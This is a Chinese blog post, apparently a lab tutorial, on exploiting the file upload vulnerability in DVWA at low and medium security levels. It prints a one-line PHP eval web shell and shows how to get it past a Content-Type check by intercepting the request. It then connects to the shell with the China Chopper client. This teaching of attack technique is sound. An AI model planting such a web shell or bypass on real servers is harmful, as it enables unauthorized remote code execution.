文件上传漏洞(low,medium,high)

一、环境:dvwa

二、选择Upload,low级别

1、上传1.php文件和1.jpg文件都没问题

PHP文件内容为:

<?php @eval($_POST["abc"]);?>

在这里插入图片描述
在这里插入图片描述
2、访问我们上传的文件

http://192.168.152.188/dvwa/hackable/uploads/1.jpg

可以看到图片

http://192.168.152.188/dvwa/hackable/uploads/1.php

什么都看不到

3、用菜刀链接1.php文件,点击添加
在这里插入图片描述
在这里插入图片描述
4、双击链接进入
在这里插入图片描述
三、选择Upload,medium级别

1、上传2.php文件和2.jpg文件,发现不能上传2.php

2、点击view source
在这里插入图片描述

3、这里限制了上传类型,抓包修改上传类型
在这里插入图片描述

4、我们将text/plain修改为image/jpeg,成功上传
在这里插入图片描述

5、用菜刀链接一下
在这里插入图片描述

四、选择Upload,high级别

参考小课堂 – 文件包含漏洞

禁止非法,后果自负

欢迎关注公众号:web安全工具库

在这里插入图片描述

发布了88 篇原创文章 · 获赞 3 · 访问量 5524

猜你喜欢

转载自blog.csdn.net/weixin_41489908/article/details/104228856